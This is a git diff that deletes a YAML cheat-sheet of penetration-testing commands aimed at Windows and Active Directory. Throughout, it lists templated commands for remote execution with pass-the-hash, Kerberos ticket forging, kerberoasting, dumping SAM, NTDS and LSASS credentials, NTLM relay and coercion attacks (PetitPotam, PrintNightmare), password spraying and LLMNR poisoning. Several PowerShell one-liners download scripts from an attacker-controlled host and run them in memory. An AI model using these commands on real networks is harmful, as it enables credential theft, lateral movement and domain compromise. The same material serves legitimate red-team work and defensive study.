aboutsummaryrefslogtreecommitdiffstats
path: root/commands.yaml
diff options
context:
space:
mode:
Diffstat (limited to 'commands.yaml')
-rw-r--r--commands.yaml3978
1 files changed, 0 insertions, 3978 deletions
diff --git a/commands.yaml b/commands.yaml
deleted file mode 100644
index 993a91a..0000000
--- a/commands.yaml
+++ /dev/null
@@ -1,3978 +0,0 @@
-title: Commands for Fast Memo Shell from Arsenal
-commands:
- - cmd: psexec.py <domain>/<user>:<password>@<ip>
- lang: sh
- tags: impacket, windows, exec
- desc: PSEXEC with username
- - cmd: psexec.py -hashes <hash> <user>@<ip>
- lang: sh
- tags: impacket, windows, exec
- desc: PSEXEC with pass the Hash (pth)
- - cmd: export KRB5CCNAME=<ccache_file>; psexec.py -dc-ip <dc_ip> -target-ip <ip>> -no-pass -k <domain>/<user>@<target_name>
- lang: sh
- tags: impacket, windows, exec
- desc: PSEXEC with kerberos
- - cmd: smbexec.py <domain>/<user>:<password>@<ip>
- lang: sh
- tags: impacket, windows, exec
- desc: SMBEXEC with username
- - cmd: smbexec.py -hashes <hash> <user>@<ip>
- lang: sh
- tags: impacket, windows, exec
- desc: SMBEXEC with pass the Hash (pth)
- - cmd: export KRB5CCNAME=<ccache_file>; smbexec.py -dc-ip <dc_ip> -target-ip <ip>> -no-pass -k <domain>/<user>@<target_name>
- lang: sh
- tags: impacket, windows, exec
- desc: SMBEXEC with kerberos
- - cmd: wmiexec.py <domain>/<user>:<password>@<ip>
- lang: sh
- tags: impacket, windows, exec
- desc: wmiexec
- - cmd: wmiexec.py -hashes <hash> <user>@<ip>
- lang: sh
- tags: impacket, windows, exec
- desc: wmiexec with pass the hash (pth)
- - cmd: atexec.py <domain>/<user>:<password>@<ip> "command"
- lang: sh
- tags: impacket, windows, exec
- desc: atexec - execute command view the task scheduler
- - cmd: atexec.py -hashes <hash> <user>@<ip> "command"
- lang: sh
- tags: impacket, windows, exec
- desc: atexec pass the hash (pth)
- - cmd: smbclient.py <domain>/<user>:<password>@<ip>
- lang: sh
- tags: impacket, windows, exec
- desc: smbclient - connect to smb on the target
- - cmd: GetNPUsers.py <domain>/<user> -no-pass -request -format hashcat
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: GetNPUsers without password to get TGT (ASREPRoasting)
- - cmd: GetNPUsers.py -dc-ip <dc_ip> <domain>/ -usersfile <users_file> -format hashcat
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: GetNPUsers - attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ (ASREPRoasting)
- - cmd: GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: GetUSERSPN - find Service Principal Names that are associated with a normal user account (kerberoasting)
- - cmd: goldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>'@<target>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: MS14-068 - goldenPac
- - cmd: ticketer.py -nthash <nthash> -domain-sid <domain_sid> -domain <domain> <user>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: Ticketer - (golden ticket) - generate TGT/TGS tickets into ccache format which can be converted further into kirbi.
- - cmd: ticketer.py -nthash <nthash> -domain-sid <domain_sid> -domain <domain> -spn <SPN> <user>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: Ticketer - (silver ticket) - generate TGS tickets into ccache format which can be converted further into kirbi.
- - cmd: ticketConverter.py <ccache_ticket_file> <ticket_kirbi_file>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: TicketConverter - convert kirbi files (commonly used by mimikatz) into ccache files used by impacket
- - cmd: getST.py -spn cifs/<target> <domain>/<netbios_name>\$ -impersonate <user>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: Silver ticket - impersonate user
- - cmd: getTGT.py -dc-ip <dc_ip> -hashes <lm_hash>:<nt_hash> <domain>/<user>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: GetTGT - request a TGT and save it as ccache for given a password, hash or aesKey
- - cmd: GetADUsers.py -all <domain>/<user>:<password> -dc-ip <dc_ip>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: GetADUser - gather data about the domain’s users and their corresponding email addresses
- - cmd: samrdump.py <domain>/<user>:<password>@<ip>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: samrdump - system account, shares, etc... (dump info from the Security Account Manager (SAM))
- - cmd: secretsdump.py '<domain>/<user>:<password>'@<ip>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: secretsdump
- - cmd: secretsdump.py -system <SYSTEM_FILE|SYSTEM> -sam <SAM_FILE|SAM> LOCAL
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: secretsdump local dump - extract hash from sam database
- - cmd: secretsdump.py -ntds <ntds_file.dit> -system <SYSTEM_FILE> -hashes <lmhash:nthash> LOCAL -outputfile <ntlm-extract-file>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: secretsdump local dump - extract hash from ntds.dit
- - cmd: secretsdump.py <domain>/<dc_bios_name>\$/@<ip> -no-pass -just-dc-user "Administrator"
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: secretsdump - anonymous get administrator
- - cmd: secretsdump.py -just-dc-ntlm -outputfile <ntlm-extract-file> <domain>/<user>:<password>@<ip>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: secretsdump - remote extract
- - cmd: secretsdump.py -just-dc -pwd-last-set -user-status -outputfile <ntlm-extract-file> <domain>/<user>:<password>@<ip>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: secretsdump - remote extract + users infos
- - cmd: smbserver.py <shareName> <sharePath>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: smbserver - share smb folder
- - cmd: smbserver.py -username <username> -password <password> <shareName> <sharePath>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: smbserver - share smb folder with authentication
- - cmd: ntlmrelayx.py -tf <targets_file> -smb2support -e <payload_file|payload.exe>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: ntlmrelay - host a payload that will automatically be served to the remote host connecting
- - cmd: ntlmrelayx.py -tf <targets_file> -socks -smb2support
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: ntlmrelay - socks
- - cmd: ntlmrelayx.py -tf <targets_file> -smb2support
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: ntlmrelay - authenticate and dump hash
- - cmd: ntlmrelayx.py -6 -wh <attacker_ip> -t smb://<target> -l /tmp -socks -debug
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: ntlmrelay - to use with mitm6 - relay to target
- - cmd: ntlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_ip> --delegate-access
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: ntlmrelay - to use with mitm6 - delegate access
- - cmd: lookupsid.py <domain>/<user>:<password>@<ip>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: lookupsid - SID User Enumeration, extract the information about what users exist and their data.
- - cmd: reg.py <domain>/<user>:<password>@<ip> query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: reg - query registry info remotely
- - cmd: rpcdump.py <domain>/<user>:<password>@<ip>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: rpcdump - list rpc endpoint
- - cmd: services.py <domain>/<user>:<password>@<ip> <action>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: services.py - (start, stop, delete, read status, config, list, create and change any service) remote
- - cmd: getArch.py -target <ip>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: getarch - find target architecture (64 or 32 bits)
- - cmd: netview.py <domain>/<user> -target <ip> -users <users_file>
- lang: sh
- tags: impacket, windows, kerberos, 88
- desc: netview - enumeration tool (ip/shares/sessions/logged users) - need dns set
- - cmd: python3 scshell.py -service-name <service-name|defragsvc> -hashes :<ntlm-hash> <domain>/<user>@<ip>
- lang: sh
- tags: SCShell, psexec, sealthy, DCERPC
- desc: stealty psexec
- - cmd: neo4j start
- lang: bash
- tags: bloodhound, Active directory enumeration
- desc: start neo4j server
- - cmd: bloodhound
- lang: bash
- tags: bloodhound, Active directory enumeration
- desc: bloodhound start IHM
- - cmd: bloodhound-python -d <domain> -u <user> -p <password> -c all
- lang: bash
- tags: bloodhound, Active directory enumeration
- desc: bloodhound - collect data
- - cmd: bloodhound-python -d <domain> -u <user> -p <password> -gc <global_catalog> -dc <domain_controler> -c all
- lang: bash
- tags: bloodhound, Active directory enumeration
- desc: bloodhound - collect data (alternative)
- - cmd: import-module sharphound.ps1; invoke-bloodhound -collectionmethod all -domain <domain>
- lang: ps1
- tags: bloodhound, Active directory enumeration
- desc: sharphound - collect bloodhound data
- - cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/SharpHound.ps1') | Invoke-BloodHound -CollectionMethod All -domain <domain>
- lang: ps1
- tags: bloodhound, Active directory enumeration
- desc: sharphound - collect bloodhound data download and execute
- - cmd: cypheroth -u <bh_user|neo4j> -p <bh_password|exegol4thewin> -d <domain>
- lang: bash
- tags: bloodhound, Active directory enumeration
- desc: cypheroth - start
- - cmd: aclpwn -f <computer_name> -ft computer -d <domain> -dry
- lang: sh
- tags: bloodhound, Active directory enumeration
- desc: aclpwn - from computer to domain - dry run
- - cmd: certipy find -u <user>@<domain> -p '<password>' -dc-ip <dc-ip>
- lang: sh
- tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
- desc: certipy - list certificate templates
- - cmd: certipy req -u <user>@<domain> -p '<password>' -target <ca-fqdn> -template <template> -ca <certificate-authority>
- lang: sh
- tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
- desc: certipy - request certificate
- - cmd: certipy auth -pfx <pfx-file>
- lang: sh
- tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
- desc: certipy - authenticate with pfx certificate
- - cmd: certipy auth -pfx <pfx-file> -dc-ip <dc-ip> -ldap-shell
- lang: sh
- tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
- desc: certipy - authenticate through LDAP (Schannel) with pfx certificate
- - cmd: certipy ca -u <user>@<domain> -p '<password>' -backup -ca <certificate-authority> -target-ip <ca-ip>
- lang: sh
- tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
- desc: certipy - Golden Certificate - steal CA certificate and private key
- - cmd: certipy forge -ca-pfx <pfx-file> -upn <user>@<domain> -crl ldap://<dc-ip>:389
- lang: sh
- tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
- desc: certipy - Golden Certificate - forge certificate
- - cmd: certipy req -u <user>@<domain> -p '<password>' -target <ca-fqdn> -template <template> -ca <certificate-authority> -upn <targeted-user>@<domain>
- lang: sh
- tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
- desc: certipy - request certificate for another user - ESC1 - ESC6
- - cmd: certipy req -u <user>@<domain> -p '<password>' -target <ca-fqdn> -template <template> -ca <certificate-authority> -on-behalf-of '<NetBIOS-domain-name>\<targeted-user>' -pfx <pfx-file>
- lang: sh
- tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
- desc: certipy - request certificate on behalf of with Certificate Request Agent certificate - ESC3
- - cmd: certipy template -u <user>@<domain> -p '<password>' -template <template> -save-old
- lang: sh
- tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
- desc: certipy - modify template in order to make it vulnerable to ESC1 - ESC4
- - cmd: certipy ca -u <user>@<domain> -p '<password>' -ca <certificate-authority> -issue-request <csr-id>
- lang: sh
- tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
- desc: certipy - Issue certificate for specific request id - ESC7
- - cmd: certipy relay -ca <ca-fqdn>
- lang: sh
- tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
- desc: certipy - relay authentication to CA Web Enrollment - ESC8
- - cmd: certipy relay -ca <ca-fqdn> -template 'DomainController'
- lang: sh
- tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
- desc: certipy - relay domain controller authentication to CA Web Enrollment - ESC8
- - cmd: certipy account update -u <user>@<domain> -p '<password>' -user <targeted-user> -upn <administrator-user>
- lang: sh
- tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
- desc: certipy - Modify user upn to another one - ESC9 - ESC10
- - cmd: certipy shadow auto -u <user>@<domain> -p '<password>' -account <targeted-user>
- lang: sh
- tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
- desc: certipy - Get NT hash - Shadow Credential
- - cmd: cme smb <ip>
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - enumerate hosts, network
- - cmd: cme smb <ip> -u <user> -p '<password>' --pass-pol
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - enumerate password policy
- - cmd: cme smb <ip> -u '' -p ''
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - enumerate null session
- - cmd: cme smb <ip> -u 'a' -p ''
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - enumerate anonymous login
- - cmd: cme smb <ip> -u <user> -p '<password>' --sessions
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - enumerate active sessions
- - cmd: cme smb <ip> -u <user> -p '<password>' --users
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - enumerate domain users
- - cmd: cme smb <ip> -u <user> -p '<password>' --rid-brute
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - enumerate users by bruteforce the RID
- - cmd: cme smb <ip> -u <user> -p '<password>' --groups
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - enumerate domain groups
- - cmd: cme smb <ip> -u <user> -p '<password>' --local-groups
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - enumerate local groups
- - cmd: cme smb <ip> -u <user> -p <password> -d <domain> --shares
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - enumerate shares
- - cmd: cme smb <ip> -u <user> -p '<password>' --disks
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - enumerate disks
- - cmd: cme smb <ip> --gen-relay-list smb_targets.txt
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - enumerate smb target not signed
- - cmd: cme smb <ip> -u <user> -p '<password>' --loggedon-users
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - enumerate logged users
- - cmd: cme smb <ip> -u <user|Administrator> -p '<password>' --local-auth --wdigest enable
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - enable wdigest
- - cmd: cme smb <ip> -u <user> -p '<password>' -x 'quser'; cme smb <ip> -u <user> -p '<password>' -x 'logoff <id_user>' --no-output
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - loggout user
- - cmd: cme smb <ip> -u <user> -p <password> --local-auth
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - local-auth
- - cmd: cme smb <ip> -u <user> -H <hash> --local-auth
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - local-auth with hash
- - cmd: cme smb <ip> -u <user> -p <password> -d <domain>
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - domain auth
- - cmd: cme smb <ip> --kerberos
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - kerberos auth
- - cmd: cme smb <ip> -u <user> -p <password> -d <domain> --sam
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - Dump SAM
- - cmd: cme smb <ip> -u <user> -p <password> -d <domain> --lsa
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - Dump LSA
- - cmd: cme smb <ip> -u <user> -p <password> -d <domain> --ntds
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - dump ntds.dit
- - cmd: cme smb <ip> -u <user> -p <password> -d <domain> -M lsassy
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - dump lsass
- - cmd: cme smb <ip> --local-auth -u <user> -H <hash> -M lsassy -o BLOODHOUND=True NEO4JUSER=<user|neo4j> NEO4JPASS=<neo4jpass|exegol4thewin>
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - dump lsass - with bloodhond update
- - cmd: cme smb <dc-ip> -u <user.txt> -p <password.txt> --no-bruteforce --continue-on-success
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - password spray (user=password)
- - cmd: cme smb <dc-ip> -u <user.txt> -p <password.txt> --continue-on-success
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - password spray multiple test
- - cmd: cme smb <ip> -u <user> -p <password> --put-file <local_file> <remote_path|\\Windows\\Temp\\target.txt>
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - put file
- - cmd: cme smb <ip> -u <user> -p <password> --get-file <remote_path|\\Windows\\Temp\\target.txt> <local_file>
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - get file
- - cmd: cme ldap <ip> -u <user> -p '' --asreproast ASREProastables.txt --kdcHost <dc_ip>
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - ASREPRoast enum without authentication
- - cmd: cme ldap <ip> -u <user> -p '<password>' --asreproast ASREProastables.txt --kdcHost <dc_ip>
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - ASREPRoast enum with authentication
- - cmd: cme ldap <ip> -u <user> -p '<password>' --kerberoasting kerberoastables.txt --kdcHost <dc_ip>
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - Kerberoasting
- - cmd: cme ldap <ip> -u <user> -p '<password>' --trusted-for-delegation
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - Unconstrained delegation
- - cmd: cme winrm <ip> -u <user> -p <password>
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - winrm-auth
- - cmd: cme mssql <ip> -u <user.txt> -p <password.txt> --no-bruteforce
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - mssql password spray
- - cmd: cme mssql <ip> -u <user> -p '<password>' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases; '
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - mssql execute query
- - cmd: cme mssql <ip> -u <user> -p '<password>' --local-auth -x <cmd|whoami>
- lang: bash
- tags: cme, crackmapexec, windows, Active directory
- desc: cme - mssql execute command
- - cmd: coercer.py -d '<domain>' -u '<user>' -p '<password>' --listener <hackerIp> <targetIp>
- lang: sh
- tags: adcs, certificate, windows, Active directory, template
- desc: coercer - list vulns
- - cmd: coercer.py -d '<domain>' -u '<user>' -p '<password>' --webdav-host '<ResponderMachineName>' <targetIp>
- lang: sh
- tags: adcs, certificate, windows, Active directory, template
- desc: coercer - Webdav
- - cmd: coercer.py -d '<domain>' -u '<user>' -p '<password>' --listener <hackerIp> --targets-file <PathToTargetFile>
- lang: sh
- tags: adcs, certificate, windows, Active directory, template
- desc: coercer - List vulns many targets
- - cmd: ./kerbrute_linux_amd64 userenum -d <domain> --dc <ip> <users_file>
- lang: sh
- tags: kerberos
- desc: Kerbrute usersenum
- - cmd: nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>'" <ip>
- lang: sh
- tags: kerberos
- desc: kerberos enum users
- - cmd: nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>',userdb=<users_list_file>" <ip>
- lang: sh
- tags: kerberos
- desc: kerberos enum users (with user list)
- - cmd: msfconsole -x "use auxiliary/admin/kerberos/ms14_068_kerberos_checksum"
- lang: sh
- tags: kerberos
- desc: kerberos ms14-068
- - cmd: msfconsole -x "use scanner/smb/smb_enum_gpp"
- lang: sh
- tags: kerberos
- desc: exploit gpp - group policy preference (ms14-025)
- - cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/GetUserSPNs.ps1') | IEX
- lang: ps1
- tags: kerberos
- desc: powershell - get user SPN
- - cmd: Get-LAPSPasswords -DomainController <ip_dc> -Credential <domain>\<login> | Format-Table -AutoSize
- lang: sh
- tags: laps, password
- desc: get laps passwords
- - cmd: Import-Module .\LAPSToolkit.ps1; Get-LAPSComputers
- lang: ps1
- tags: laps, password
- desc: get laps computer list
- - cmd: Import-Module .\LAPSToolkit.ps1; Find-LAPSDelegatedGroups
- lang: ps1
- tags: laps, password
- desc: find the list of group who can manipulate SAM data
- - cmd: Get-DomainObject <computer> -Properties "ms-mcs-AdmPwd",name
- lang: ps1
- tags: laps, password
- desc: powerview get laps password
- - cmd: use windows/gather/credentials/enum_laps
- lang: sh
- tags: laps, password
- desc: metasploit get laps password
- - cmd: foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
- lang: sh
- tags: laps, password
- desc: get all machine passwords
- - cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/LAPSToolkit.ps1') | IEX; Import-Module .\LAPSToolkit.ps1
- lang: ps1
- tags: laps, password
- desc: laps toolkit
- - cmd: Import-Module .\LAPSToolkit.ps1; Get-LAPSComputers
- lang: ps1
- tags: laps, password
- desc: laps toolkit - Get laps computer
- - cmd: Import-Module .\LAPSToolkit.ps1; Find-LAPSDelegatedGroups
- lang: ps1
- tags: laps, password
- desc: laps toolkit - find LAPS Delegated Groups
- - cmd: Import-Module .\LAPSToolkit.ps1; Find-AdmPwdExtendedRights
- lang: ps1
- tags: laps, password
- desc: laps toolkit - Find users with Extended rights
- - cmd: lsassy -d <domain> -u <user> -p <password> <ip>
- lang: sh
- tags: pentest
- desc: Lsassy basic usage with password (ip or range)
- - cmd: lsassy -v -u <user> -H <hash> <ip>
- lang: sh
- tags: pentest
- desc: Lsassy basic usage with hash (ip or range)
- - cmd: lsassy -d <domain> -u <user> -k <ip_range>
- lang: sh
- tags: pentest
- desc: Lsassy basic usage with kerberos (ip or range)
- - cmd: rpcdump.py <domain>/<user>:'<password>'@<dc> | grep MS-RPRN
- lang: sh
- tags: printerbug, petitpotam, Active directory
- desc: Finding Spooler services listening
- - cmd: rpcdump.py <dc> | grep -A 6 MS-RPRN
- lang: sh
- tags: printerbug, petitpotam, Active directory
- desc: Finding Spooler services anonymous
- - cmd: dementor.py -d <domain> -u <user> -p <password> <attacker_ip> <dc2>
- lang: sh
- tags: printerbug, petitpotam, Active directory
- desc: dementor
- - cmd: printerbug.py '<domain>/<user>:<password>'@<ip> <attacker_ip>
- lang: sh
- tags: printerbug, petitpotam, Active directory
- desc: printerbug
- - cmd: webclientservicescanner '<domain>/<user>:<password>'@<ip_range>
- lang: sh
- tags: printerbug, petitpotam, Active directory
- desc: webclientservicescanner
- - cmd: PetitPotam.py -u <user> -p '<password>' -d <domain> <listener> <target>
- lang: sh
- tags: printerbug, petitpotam, Active directory
- desc: PetitPotam
- - cmd: ntlmrelayx -t ldaps://<dc1> -smb2support --remove-mic --add-computer <computer_name> <computer_password> --delegate-access
- lang: sh
- tags: printerbug, petitpotam, Active directory
- desc: ntlmrelayx add computer
- - cmd: getST.py -spn host/<dc2> -impersonate <user_to_impersonate> -dc-ip <dc1_ip> '<domain>/<computer_name>$:<computer_password>'
- lang: sh
- tags: printerbug, petitpotam, Active directory
- desc: use silver ticket
- - cmd: secretsdump -k <dc>
- lang: sh
- tags: printerbug, petitpotam, Active directory
- desc: secret dump with kerberos
- - cmd: CVE-2021-1675.py <domain>/<user>:<password>@<target_ip> '\\<attacker_ip>\<share_name>\<dll_name|inject>.dll'
- lang: sh
- tags: printerbug, petitpotam, Active directory
- desc: PrintNightmare
- - cmd: PrintSpooferNet.exe \\.\pipe\test\pipe\spoolss <launch_cmd>
- lang: sh
- tags: printerbug, petitpotam, Active directory
- desc: Printspoofer privesc
- - cmd: SpoolSample.exe <target_hostname> <target_hostname>/pipe/test
- lang: sh
- tags: printerbug, petitpotam, Active directory
- desc: Spoolsample launch pipe
- - cmd: SpoolSample.exe <target_server> <capture_server>
- lang: sh
- tags: printerbug, petitpotam, Active directory
- desc: Spoolsample
- - cmd: mitm6 -d <domain>
- lang: sh
- tags: mitm6, ipv6, man in the middle
- desc: run mitm6 (to run with impacket-ntlmrelayx)
- - cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/powerview.ps1') | IEX
- lang: ps1
- tags: ad, windows, powerview
- desc: load from remote
- - cmd: $passwd = ConvertTo-SecureString "<password>" -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential ("<domain>\<user>", $passwd)
- lang: ps1
- tags: ad, windows, powerview
- desc: Set alternative creds to use
- - cmd: ConvertFrom-SID <sid>
- lang: ps1
- tags: ad, windows, powerview
- desc: Get User from SID
- - cmd: Get-ObjectAcl -Identity <user> -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_}
- lang: ps1
- tags: ad, windows, powerview
- desc: Find user ACL
- - cmd: Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
- lang: ps1
- tags: ad, windows, powerview
- desc: Find all domain user ACL
- - cmd: Add-DomainObjectAcl -TargetIdentity <target> -PrincipalIdentity <current_user> -Rights All
- lang: ps1
- tags: ad, windows, powerview
- desc: Add user DACL
- - cmd: Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
- lang: ps1
- tags: ad, windows, powerview
- desc: Find all groups our current user got access
- - cmd: Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
- lang: ps1
- tags: ad, windows, powerview
- desc: Find all users our current user got access
- - cmd: Add-DomainObjectAcl -TargetIdentity <target> -PrincipalIdentity <user> -Rights All
- lang: ps1
- tags: ad, windows, powerview
- desc: Add GenericAll to target for user
- - cmd: Get-DomainComputer -Unconstrained
- lang: ps1
- tags: ad, windows, powerview
- desc: Find all Computer with unconstrained delegation
- - cmd: Get-DomainTrustMapping
- lang: ps1
- tags: ad, windows, powerview
- desc: Get all domain trust
- - cmd: Get-DomainGroupMember -Identity "<group|Administrators>" -Domain <domain> -Recurse
- lang: ps1
- tags: ad, windows, powerview
- desc: Get all members of a a given group
- - cmd: Get-DomainUser -SPN -Domain <domain> | select name, samaccountname, serviceprincipalname
- lang: ps1
- tags: ad, windows, powerview
- desc: Get list of kerberoastable users
- - cmd: responder –I eth0
- lang: sh
- tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
- desc: responder launch
- - cmd: responder –I eth0 -A
- lang: sh
- tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
- desc: responder launch - analyze mode (no poisoning)
- - cmd: responder -I eth0 --wpad
- lang: sh
- tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
- desc: responder launch with wpad file
- - cmd: sed -i 's/HTTP = Off/HTTP = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='
- lang: sh
- tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
- desc: responder http on
- - cmd: sed -i 's/HTTP = On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='
- lang: sh
- tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
- desc: responder http off
- - cmd: sed -i 's/SMB = Off/SMB = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='
- lang: sh
- tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
- desc: responder smb on
- - cmd: sed -i 's/SMB = On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='
- lang: sh
- tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
- desc: responder smb off
- - cmd: sed -i 's/Challenge =.*$/Challenge = <challenge>/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'Challenge ='
- lang: sh
- tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
- desc: responder challenge set
- - cmd: sed -i 's/Challenge =.*$/Challenge = 1122334455667788/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'Challenge ='
- lang: sh
- tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
- desc: responder challenge reset
- - cmd: multirelay -t <ip> -u <user1> <user2>
- lang: sh
- tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
- desc: multirelay attack - user filtered (previous disable HTTP and SMB in Responder.conf)
- - cmd: multirelay -t <ip> -u ALL
- lang: sh
- tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
- desc: multirelay attack - all user (previous disable HTTP and SMB in Responder.conf)
- - cmd: runfinger -i <network_range>
- lang: sh
- tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
- desc: runfinger - Responder-related utility which will finger a single IP address or an IP subnet and will reveal if a target requires SMB Signing or not.
- - cmd: rpcclient <ip> -U "<user>%<password>" -c "enumdomusers; quit"
- lang: sh
- tags: rpcclient, rpc, windows
- desc: rpcclient - enumdomusers
